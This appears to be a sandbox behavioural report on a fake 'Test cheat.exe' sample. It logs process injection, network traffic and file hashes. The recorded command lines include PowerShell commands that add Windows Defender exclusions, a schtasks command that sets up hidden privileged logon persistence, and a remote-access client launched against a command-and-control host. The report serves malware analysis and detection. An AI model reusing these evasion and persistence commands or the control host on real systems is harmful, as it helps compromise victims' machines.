N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3184 wrote to memory of 4916 N/A C:\Users\Admin\AppData\Local\Temp\Test cheat.exe C:\Users\Admin\AppData\Local\Temp\Client.exe
PID 3184 wrote to memory of 4916 N/A C:\Users\Admin\AppData\Local\Temp\Test cheat.exe C:\Users\Admin\AppData\Local\Temp\Client.exe
PID 3184 wrote to memory of 4916 N/A C:\Users\Admin\AppData\Local\Temp\Test cheat.exe C:\Users\Admin\AppData\Local\Temp\Client.exe
PID 3184 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\Test cheat.exe C:\Users\Admin\AppData\Local\Temp\switched.exe
PID 3184 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\Test cheat.exe C:\Users\Admin\AppData\Local\Temp\switched.exe
PID 3184 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\Test cheat.exe C:\Users\Admin\AppData\Local\Temp\switched.exe
PID 3212 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
PID 3212 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
PID 3636 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe C:\Windows\system32\cmd.exe
PID 3636 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe C:\Windows\system32\cmd.exe
PID 3212 wrote to memory of 3216 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\tesetey.exe
PID 3212 wrote to memory of 3216 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\tesetey.exe
PID 3212 wrote to memory of 3216 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\tesetey.exe
PID 4620 wrote to memory of 4948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 4620 wrote to memory of 4948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 4620 wrote to memory of 556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 4620 wrote to memory of 556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 4620 wrote to memory of 1716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 4620 wrote to memory of 1716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3216 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 3216 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 3216 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 3508 wrote to memory of 456 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3508 wrote to memory of 456 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3508 wrote to memory of 456 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3216 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\explorer.exe
PID 3216 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\explorer.exe
PID 3216 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3216 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3216 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3216 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3216 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3216 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3216 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3216 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1720 wrote to memory of 4668 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 1720 wrote to memory of 4668 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 1720 wrote to memory of 4668 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 1720 wrote to memory of 2244 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 1720 wrote to memory of 2244 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 1720 wrote to memory of 2244 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 4668 wrote to memory of 4308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4668 wrote to memory of 4308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4668 wrote to memory of 4308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2244 wrote to memory of 4968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2244 wrote to memory of 4968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2244 wrote to memory of 4968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4916 wrote to memory of 3968 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SysWOW64\cmd.exe
PID 4916 wrote to memory of 3968 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SysWOW64\cmd.exe
PID 4916 wrote to memory of 3968 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SysWOW64\cmd.exe
PID 4916 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SysWOW64\cmd.exe
PID 4916 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SysWOW64\cmd.exe
PID 4916 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SysWOW64\cmd.exe
PID 3968 wrote to memory of 3872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3968 wrote to memory of 3872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3968 wrote to memory of 3872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4484 wrote to memory of 2820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4484 wrote to memory of 2820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4484 wrote to memory of 2820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4484 wrote to memory of 4340 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\CatRoot\$SXR\$SXR.exe
PID 4484 wrote to memory of 4340 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\CatRoot\$SXR\$SXR.exe
PID 4484 wrote to memory of 4340 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\CatRoot\$SXR\$SXR.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Test cheat.exe

"C:\Users\Admin\AppData\Local\Temp\Test cheat.exe"

C:\Users\Admin\AppData\Local\Temp\Client.exe

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

C:\Users\Admin\AppData\Local\Temp\switched.exe

"C:\Users\Admin\AppData\Local\Temp\switched.exe"

C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"

C:\Users\Admin\AppData\Local\Temp\tesetey.exe

"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"

C:\Windows\system32\certutil.exe

certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5

C:\Windows\system32\find.exe

find /i /v "md5"

C:\Windows\system32\find.exe

find /i /v "certutil"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mpkwo0xk\mpkwo0xk.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5275.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8A43077877AC447E8DF444FB3249E46.TMP"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6774.tmp.bat""

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\System32\CatRoot\$SXR\$SXR.exe

"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 keyauth.win udp
US 172.67.72.57:443 keyauth.win tcp
US 8.8.8.8:53 x2.c.lencr.org udp
GB 173.222.13.40:80 x2.c.lencr.org tcp
US 8.8.8.8:53 57.72.67.172.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 40.13.222.173.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 172.67.72.57:443 keyauth.win tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 case-shield.gl.at.ply.gg udp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:80 ipinfo.io tcp
US 8.8.8.8:53 17.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 8.8.8.8:53 81.171.91.138.in-addr.arpa udp
N/A 127.0.0.1:59457 tcp
N/A 127.0.0.1:59459 tcp
N/A 127.0.0.1:59485 tcp
N/A 127.0.0.1:59487 tcp
US 8.8.8.8:53 operating-noble.gl.at.ply.gg udp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 8.8.8.8:53 18.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Client.exe

MD5 f741b8b94acc5b0efa7545b2947c2b63
SHA1 2eeb6aa78b8a7b95ab54a369a5c7554946d2c772
SHA256 8835d4401e46c7ef79f561fc6483d7d7bff005dbc20c09637891e5d409e7de07
SHA512 fed3df2f6915386f4866c6c6d7e841b7bf8f2e1ef709af70ac623de30321a7593bbb0def31e8e163faccfccb7fcc8a54013396fde232e46f430519b884199fea

C:\Users\Admin\AppData\Local\Temp\Client.exe

MD5 fff48155224ffb14715fa66575e89263
SHA1 52eef79f11d35370237aefe7a2541c601511223f
SHA256 78b662493b01b6afabc284e881f3545298dddf0139ad7e3c95e2c3b3b6ec0f2c
SHA512 0c99aac5a4c962aeee98c85bfd8a066dc6d59332f98e7335db773d43db84409e6c66c0f4b27501db51f18c8a7752fe09308fb8b8cea3a6a20dcc361ec0b9d0b0

C:\Users\Admin\AppData\Local\Temp\switched.exe

MD5 b9bbe31d276de5c3d05352d070ae4244
SHA1 5e1bb67b01c579b4e0ad5a7475ceb657201c27ec
SHA256 a01977e758a85dc01fb8ca7da9110adfe5bf9b9bec0af1db82741fe83d20408d
SHA512 0a3459690bfdf8d238cb6f27c650903659c12aa589bcba037a45c68287342f53ca5c1e1b307a0abd8d481f79e3df6bd994cce6a79258343627aa7b3209b0ed17

C:\Users\Admin\AppData\Local\Temp\Client.exe

MD5 05d1e97dc498d38e1bba9dc8c897180e
SHA1 6c0bfbc0535a0965e418be21d2286b3b022fb4b6
SHA256 58104b87df4f81c949939b66e532da5baaf75fb26f1960bd40755411a8ecc269
SHA512 6ef86b1fac3d11c042e46107730b6d74a3ef8b0f25a3ec9a73c1e59e97a629f7a25568981e1a6210c9448824fd5f35936c57a9b14b6ea973f66696a153f61cb1

memory/4916-20-0x0000000000320000-0x0000000000960000-memory.dmp

memory/4916-21-0x0000000073920000-0x00000000740D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

MD5 ceb8c3c0f2249f05f3df8f88d46ae743
SHA1 651675ba157c085ce64aa5bb2abbfd6f5efc75c6
SHA256 a047b5971bf32a48532d2dc9276f3f1208ebaa6ac2efe650bd827344fe86b778
SHA512 872d88e2306b40567ec28bb96875fa91a37425e36ad8264a20ba9a29c4552a090fd6336747e7f65056203ce29fedab600aa51684fa525c5417be484bc6b1766a

memory/3636-38-0x00007FF766CB0000-0x00007FF7670EC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tesetey.exe

MD5 0f0838bc6642dd6bc603368e50b4aba3
SHA1 932bd4d1c11996bf8ac3ac74a94b266e96d44c36
SHA256 4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9
SHA512 a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860

memory/3216-41-0x0000000000A80000-0x0000000000B02000-memory.dmp

memory/3216-42-0x0000000073920000-0x00000000740D0000-memory.dmp

memory/3216-43-0x0000000005370000-0x000000000540C000-memory.dmp

memory/3216-44-0x0000000005410000-0x00000000054A2000-memory.dmp

memory/3216-45-0x00000000055D0000-0x00000000055E0000-memory.dmp

memory/3216-46-0x0000000006FA0000-0x0000000007544000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\mpkwo0xk\mpkwo0xk.cmdline

MD5 f328fbfb2888758ad382778082413661
SHA1 4a84ad95af425856e08cb6e35a4119c634cb6a16
SHA256 4cf5ff55af348f5c753d19cc2d88473cc6bbc358db36d37d6339c98a5bcfe14b
SHA512 a08d4c8fe91df46b6eb5e7c5b25df5fc76f87de3b620f4152f7fe1f8e4eef0c9147a2d8a6af889e8eeeacbf9be5ce49b1b92b78ce865e8453dfeefdeb294f512

\??\c:\Users\Admin\AppData\Local\Temp\mpkwo0xk\mpkwo0xk.0.cs

MD5 14846c9faaef9299a1bf17730f20e4e6
SHA1 8083da995cfaa0e8e469780e32fcff1747850eb6
SHA256 61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b
SHA512 549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

\??\c:\Users\Admin\AppData\Local\Temp\CSC8A43077877AC447E8DF444FB3249E46.TMP

MD5 e9144225655a1177485a6238f397718e
SHA1 0618d989814312c38b8005fc469222f891470642
SHA256 f2ff3d3919bf3120bd18978b0225c56b53eec3a645493f7fe08344671cacb21d
SHA512 392b9684bc1c0d054a397bb8ed54bc682a59ea6c1c12abad5d70ec2f0065afec4645cae8c2672ec4571d5763397092388b944cd5c7582a4aa685ecd4e3a0c2a4

C:\Users\Admin\AppData\Local\Temp\RES5275.tmp

MD5 5602eacaae3f4bfe9c1851f554106e6b
SHA1 183ca25b0529e2fcb9b004d209e4a7a14e1a0744
SHA256 b0ff21bb9f5de5964d9ca70f5da61ff243f38cf6b47c74257f0194558b585a49
SHA512 03515d034ba6897df74d72b4cae947648a05b92295347c53fa3e2faee218136c6e152a00eca9f564fe2357dbd71972a6190c0e6bcf65f7f73c81fb96abd5d235

memory/1720-59-0x0000000000400000-0x0000000000424000-memory.dmp

memory/1720-60-0x0000000073920000-0x00000000740D0000-memory.dmp

memory/1720-61-0x0000000005570000-0x0000000005580000-memory.dmp

memory/3216-63-0x0000000073920000-0x00000000740D0000-memory.dmp

memory/4308-64-0x0000000004480000-0x00000000044B6000-memory.dmp

memory/4308-65-0x0000000073920000-0x00000000740D0000-memory.dmp

memory/4308-66-0x0000000004590000-0x00000000045A0000-memory.dmp

memory/4308-68-0x0000000004BD0000-0x00000000051F8000-memory.dmp

memory/4916-69-0x0000000005410000-0x0000000005420000-memory.dmp

memory/4308-67-0x0000000004590000-0x00000000045A0000-memory.dmp

memory/4308-70-0x0000000005300000-0x0000000005322000-memory.dmp

memory/4968-73-0x0000000073920000-0x00000000740D0000-memory.dmp

memory/4968-74-0x0000000002350000-0x0000000002360000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ndbewhwl.0t0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4308-86-0x0000000005510000-0x0000000005576000-memory.dmp

memory/4308-76-0x00000000053A0000-0x0000000005406000-memory.dmp

memory/4968-75-0x0000000002350000-0x0000000002360000-memory.dmp

memory/4308-87-0x0000000005580000-0x00000000058D4000-memory.dmp

memory/4308-97-0x0000000005A30000-0x0000000005A4E000-memory.dmp

memory/4308-98-0x0000000005D70000-0x0000000005DBC000-memory.dmp

memory/4916-99-0x0000000005290000-0x00000000052B2000-memory.dmp

memory/4308-103-0x000000006FC80000-0x000000006FCCC000-memory.dmp

memory/4308-102-0x000000007F760000-0x000000007F770000-memory.dmp

memory/4916-101-0x0000000073920000-0x00000000740D0000-memory.dmp

memory/4308-100-0x0000000006010000-0x0000000006042000-memory.dmp

memory/4308-114-0x0000000005FC0000-0x0000000005FDE000-memory.dmp

memory/4308-115-0x0000000004590000-0x00000000045A0000-memory.dmp

memory/3636-109-0x00007FF766CB0000-0x00007FF7670EC000-memory.dmp

memory/4308-117-0x0000000006AC0000-0x0000000006B63000-memory.dmp

memory/4968-118-0x000000007F2A0000-0x000000007F2B0000-memory.dmp

memory/4968-124-0x000000006FC80000-0x000000006FCCC000-memory.dmp

memory/4916-135-0x0000000073920000-0x00000000740D0000-memory.dmp

memory/1720-134-0x0000000073920000-0x00000000740D0000-memory.dmp

memory/4968-137-0x0000000002350000-0x0000000002360000-memory.dmp

memory/4968-136-0x0000000002350000-0x0000000002360000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp6774.tmp.bat

MD5 77be3868de8f657d15c9ff6a161dab6c
SHA1 630d2e8bf3976dc6ea4a8b0bf38f2256af48cc33
SHA256 12199f00c8fadcadf0629c06599c700b2b9454013f2d7ecce6e7e35cd740914b
SHA512 552fb2c4d10905b01997e1505014681bb547ff231b117dbe16b209174fed942e6963989c5cfc72ac65cec7f9ab412a49075de94d81fa5961e08af2e3d0e38807

memory/4308-139-0x00000000073F0000-0x0000000007A6A000-memory.dmp

memory/4308-140-0x0000000006D70000-0x0000000006D8A000-memory.dmp

memory/4968-141-0x0000000006FA0000-0x0000000006FAA000-memory.dmp

memory/4968-142-0x0000000007190000-0x0000000007226000-memory.dmp

memory/4308-143-0x0000000006F60000-0x0000000006F71000-memory.dmp

memory/4968-144-0x0000000007150000-0x000000000715E000-memory.dmp

memory/4968-145-0x0000000007160000-0x0000000007174000-memory.dmp

memory/4968-146-0x0000000007250000-0x000000000726A000-memory.dmp

memory/4308-147-0x0000000007080000-0x0000000007088000-memory.dmp

memory/4968-150-0x0000000073920000-0x00000000740D0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
